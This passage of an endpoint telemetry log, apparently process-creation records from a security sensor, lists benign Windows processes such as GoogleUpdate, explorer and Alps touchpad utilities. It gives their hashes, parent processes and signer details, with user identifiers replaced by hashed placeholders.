00:52:12.585317800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\GoogleUpdate.exe,20356,128,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-23 01:50:56.366826900+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Update,1.3.36.81,Google Update,GoogleUpdate.exe,Google Crash Handler
+653,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:52:13.037205800+00:00,16500,GoogleCrashHandler64.exe,"""GoogleCrashHandler64.exe""",PortableExecutable,2021-04-21 05:19:26.595569300+00:00,C:\Program Files (x86)\Google\Update\Ipv4PII_025de4296ab244d9ac811ef514f9d0b5ad63b5fd\GoogleCrashHandler64.exe,374616,7bd9abfc8a31fd0ec1e674feb7ad2b5b,af0d678cf5d4bdd7a364e95460eb46e94f67a5037f4e4ad28580282c22f17812,1f466c4d5857a4d454780d87dea58d582ebed991,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:52:12.585317800+00:00,20356,GoogleUpdate.exe,"""GoogleUpdate.exe"" /c",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:13.082510400+00:00,2021-06-24 00:53:26.864486300+00:00,566c4900-a2f2-423c-a6e7-865beb55060b,computerpii_0a470890c60768167990033d701e7bd881398861,167850,False,10.7740.19041.1052,False,11540474045175113,,11540474045175124,2021-06-24 00:52:12.585317800+00:00,20356,2021-06-24 00:52:12.585317800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\GoogleUpdate.exe,20356,128,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-23 01:50:56.366826900+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Update,1.3.36.81,Google Update,GoogleUpdate.exe,Google Crash Handler
+654,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:52:13.068829700+00:00,20400,GoogleUpdate.exe,"""GoogleUpdate.exe"" /ua /installsource core",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:52:12.585317800+00:00,20356,GoogleUpdate.exe,"""GoogleUpdate.exe"" /c",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:13.099603300+00:00,2021-06-24 00:53:26.864557100+00:00,2b49fc2d-33ed-4319-a7b6-dd1b3686bd66,computerpii_0a470890c60768167990033d701e7bd881398861,167851,False,10.7740.19041.1052,False,11540474045175113,,11540474045175125,2021-06-24 00:52:12.585317800+00:00,20356,2021-06-24 00:52:12.585317800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\GoogleUpdate.exe,20356,128,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-23 01:50:56.366826900+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+655,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,PortableExecutable,2021-06-09 01:20:37.358875500+00:00,C:\Windows\explorer.exe,4891752,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,582a919ca5f944aa83895a5c633c122c,eda7ee39d4db8142a1e0788e205e80ae798035d60273e74981e09e98c8d0e740,6d0c6aea6bce05166761085b1d612558f81d877a,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:12.833640100+00:00,13428,userinit.exe,userinit.exe,False,2021-06-23 11:04:14.036541300+00:00,11720,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:13.159577300+00:00,2021-06-24 00:53:26.864903400+00:00,24c8121b-b78e-43cd-8c64-77997cc18d03,computerpii_0a470890c60768167990033d701e7bd881398861,167857,False,10.7740.19041.1052,False,11540474045175119,,11540474045175127,2021-06-24 00:52:12.833640100+00:00,13428,2021-06-24 00:52:12.833640100+00:00,\Device\HarddiskVolume3\Windows\System32\userinit.exe,13428,128,ActiveProcessStartkey,C:\Windows\System32,34816,2086-04-07 12:35:36+00:00,2019-12-07 09:08:49.164262100+00:00,2021-06-24 00:52:12.849437300+00:00,2019-12-07 09:08:49.164262100+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,2.0,1.0,1.0,20481.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,userinit,USERINIT.EXE,Userinit Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer
+656,False,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:13.217921600+00:00,1764,ApMsgFwd.exe,"""ApMsgFwd.exe"" -s{05FA8492-C047-4207-BE65-780D8591C113}",PortableExecutable,2019-11-05 04:39:28+00:00,C:\Windows\System32\DellTPad\ApMsgFwd.exe,78224,a0d01803ba23a100c85167aeb4d71443,119a56501865f1ad1b28d4200d8ad416263ac62f804d44382b3de1391316f11d,2a55b50b96ad8e4d6f3e591f95cfa9cd212e8c5c,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,S-1-12-1-3476864874-1154527411-4288707492-1560701320,domainpii_6c8dcea42fcdd51d2421333a881b2b98b372fa53,userpii_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:12.279211200+00:00,9228,Apoint.exe,"""Apoint.exe""",False,2021-06-10 00:46:11.803639100+00:00,4428,HidMonitorSvc.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:13.396913600+00:00,2021-06-24 00:53:26.865504900+00:00,c9ed6c00-e42f-46d4-9458-ca9956c2b30d,computerpii_0a470890c60768167990033d701e7bd881398861,167865,False,10.7740.19041.1052,False,11540474045175105,,11540474045175128,2021-06-24 00:52:12.279211200+00:00,9228,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,128,Missing,c:\windows\system32\delltpad\apoint.exe,1191312,2019-09-24 17:35:09+00:00,2019-11-05 04:39:30+00:00,2021-06-24 00:52:12.271926500+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver,"Alps Electric Co., Ltd.",ApMsgFwd,"8, 1, 0, 157",ApMsgFwd,ApMsgFwd.exe,ApMsgFwd
+657,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:13.284846100+00:00,4224,ApntEx.exe,"""Apntex.exe""",PortableExecutable,2019-11-05 04:39:30+00:00,C:\Windows\System32\DellTPad\ApntEx.exe,35216,bada964e9b2a110ff8ff5e19a00fbdda,73e2cbc7c4cfdc222974b5fb3cbf927156c434ffbaf8d14fa45c9b902d3d3584,5bed7dec830b99dd67785c7e9e449e29d47f4049,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:12.279211200+00:00,9228,Apoint.exe,"""Apoint.exe""",False,2021-06-10 00:46:11.803639100+00:00,4428,\Device\HarddiskVolume3\Windows\System32\DellTPad\HidMonitorSvc.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:13.434874+00:00,2021-06-24 00:53:26.865588800+00:00,7bb4d622-ad46-4cf2-9a52-e98cc5892f95,computerpii_0a470890c60768167990033d701e7bd881398861,167866,False,10.7740.19041.1052,False,11540474045175105,,11540474045175129,2021-06-24 00:52:12.279211200+00:00,9228,2021-06-24 00:52:12.279211200+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\Apoint.exe,9228,18560,ActiveProcessStartkey,C:\Windows\System32\DellTPad,1191312,2019-09-24 17:35:09+00:00,2019-11-05 04:39:30+00:00,2021-06-24 00:52:12.271926500+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver,"Alps Electric Co., Ltd.",Alps Pointing-device Driver for Windows,"8, 1, 0, 139",Alps Pointing-device Driver for Windows,ApntEx.exe,Alps Pointing-device Driver for Windows
+658,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:13.292922400+00:00,19752,ApRemote.exe,"""ApRemote.exe""",PortableExecutable,2019-11-05 04:39:30+00:00,C:\Windows\System32\DellTPad\ApRemote.exe,134544,4c56cd1ebd7c91723353ae6fb4156f7f,dd1337f8edb0521c8928fc208046abda8815b29e5880aaef9ce12d1ae8588abe,36bacb69397345b85cf4e0770656eea05ab5461e,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:12.279211200+00:00,9228,Apoint.exe,"""Apoint.exe""",False,2021-06-10 00:46:11.803639100+00:00,4428,\Device\HarddiskVolume3\Windows\System32\DellTPad\HidMonitorSvc.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:13.439236900+00:00,2021-06-24 00:53:26.865662100+00:00,0a206b0b-68a0-4bc0-bc27-f2f9c1a9f9c5,computerpii_0a470890c60768167990033d701e7bd881398861,167867,False,10.7740.19041.1052,False,11540474045175105,,11540474045175130,2021-06-24 00:52:12.279211200+00:00,9228,2021-06-24 00:52:12.279211200+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\Apoint.exe,9228,128,ActiveProcessStartkey,C:\Windows\System32\DellTPad,1191312,2019-09-24 17:35:09+00:00,2019-11-05 04:39:30+00:00,2021-06-24 00:52:12.271926500+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.101.6,ApRemote.exe,ApRemote.exe,ApRemote
+659,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:13.299758600+00:00,8376,hidfind.exe,"""HidFind.exe""",PortableExecutable,2019-11-05 04:39:34+00:00,C:\Windows\System32\DellTPad\hidfind.exe,80784,96ef2112ad18bcf50257c3e0b336681d,1a01512a4a8ebb9b3b790f3d29efbad5016ff9fe2c6a359e75ed7d4869afba18,7765d712623ddddce8d57ff3a3a011ddd9713ca5,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:12.279211200+00:00,9228,Apoint.exe,"""Apoint.exe""",False,2021-06-10 00:46:11.803639100+00:00,4428,\Device\HarddiskVolume3\Windows\System32\DellTPad\HidMonitorSvc.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:13.458842700+00:00,2021-06-24 00:53:26.865811700+00:00,b7654291-47bd-495b-9a7b-04292782e933,computerpii_0a470890c60768167990033d701e7bd881398861,167869,False,10.7740.19041.1052,False,11540474045175105,,11540474045175131,2021-06-24 00:52:12.279211200+00:00,9228,2021-06-24 00:52:12.279211200+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\Apoint.exe,9228,128,ActiveProcessStartkey,C:\Windows\System32\DellTPad,1191312,2019-09-24 17:35:09+00:00,2019-11-05 04:39:30+00:00,2021-06-24 00:52:12.271926500+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,"8, 1, 0, 139",Alps Pointing-device Driver,hidfind.exe,Alps Pointing-device Driver
+660,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:13.446382500+00:00,13580,ApntEx.exe,"""Apntex.exe""",PortableExecutable,2019-11-05 04:39:30+00:00,C:\Windows\System32\DellTPad\ApntEx.exe,35216,bada964e9b2a110ff8ff5e19a00fbdda,73e2cbc7c4cfdc222974b5fb3cbf927156c434ffbaf8d14fa45c9b902d3d3584,5bed7dec830b99dd67785c7e9e449e29d47f4049,bada964e9b2a110ff8ff5e19a00fbdda,73e2cbc7c4cfdc222974b5fb3cbf927156c434ffbaf8d14fa45c9b902d3d3584,5bed7dec830b99dd67785c7e9e449e29d47f4049,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.284846100+00:00,4224,ApntEx.exe,"""Apntex.exe""",False,2021-06-24 00:52:12.279211200+00:00,9228,\Device\HarddiskVolume3\Windows\System32\DellTPad\Apoint.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:13.563277400+00:00,2021-06-24 00:53:26.866780400+00:00,740e18cf-8557-4ba1-b69f-7c706cd231f0,computerpii_0a470890c60768167990033d701e7bd881398861,167880,False,10.7740.19041.1052,False,11540474045175129,,11540474045175132,2021-06-24 00:52:13.284846100+00:00,4224,2021-06-24 00:52:13.284846100+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\ApntEx.exe,4224,128,TerminateProcessStartkey,C:\Windows\System32\DellTPad,35216,2019-06-10 06:58:14+00:00,2019-11-05 04:39:30+00:00,2021-06-24 00:52:13.287227700+00:00,2019-11-05 04:39:30+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver for Windows,"8, 1, 0, 139",Alps Pointing-device Driver for Windows,ApntEx.exe,Alps Pointing-device Driver for Windows,"Alps Electric Co., Ltd.",Alps Pointing-device Driver for Windows,"8, 1, 0, 139",Alps Pointing-device Driver for Windows,ApntEx.exe,Alps Pointing-device Driver for Windows
+661,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:13.634108600+00:00,11776,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,bada964e9b2a110ff8ff5e19a00fbdda,73e2cbc7c4cfdc222974b5fb3cbf927156c434ffbaf8d14fa45c9b902d3d3584,5bed7dec830b99dd67785c7e9e449e29d47f4049,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.446382500+00:00,13580,ApntEx.exe,"""Apntex.exe""",False,2021-06-24 00:52:13.284846100+00:00,4224,\Device\HarddiskVolume3\Windows\System32\DellTPad\ApntEx.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:13.648213+00:00,2021-06-24 00:53:26.867031300+00:00,bb38f3d5-433d-4480-a9ee-892c1a761a78,computerpii_0a470890c60768167990033d701e7bd881398861,167883,False,10.7740.19041.1052,False,11540474045175132,,11540474045175133,2021-06-24 00:52:13.446382500+00:00,13580,2021-06-24 00:52:13.446382500+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\ApntEx.exe,13580,128,ActiveProcessStartkey,C:\Windows\System32\DellTPad,35216,2019-06-10 06:58:14+00:00,2019-11-05 04:39:30+00:00,2021-06-24 00:52:13.287227700+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver for Windows,"8, 1, 0, 139",Alps Pointing-device Driver for Windows,ApntEx.exe,Alps Pointing-device Driver for Windows,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+662,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:14.079581100+00:00,18000,dllhost.exe,DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:14.161186600+00:00,2021-06-24 00:53:26.868728800+00:00,1e35d1d0-04da-4b80-aa19-3a162f1ac8d5,computerpii_0a470890c60768167990033d701e7bd881398861,167903,False,10.7740.19041.1052,False,11540474045136908,,11540474045175135,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+663,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:14.977194700+00:00,18356,StartMenuExperienceHost.exe,"""StartMenuExperienceHost.exe"" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca",PortableExecutable,2020-11-11 01:19:09.905882800+00:00,C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe,793416,6aeca53f405206cad08032b2fe2423d7,03f57900a9324df23da95a46f58245649b0357f065b7f4128e387507ce9582e6,428e60ad77f5a21b3ad8e6438e80074b09426c26,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:15.067281800+00:00,2021-06-24 00:53:26.870813300+00:00,f6b7f5da-2284-47c6-8521-c086d1cfd8f6,computerpii_0a470890c60768167990033d701e7bd881398861,167932,False,10.7740.19041.1052,False,11540474045136908,,11540474045175137,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 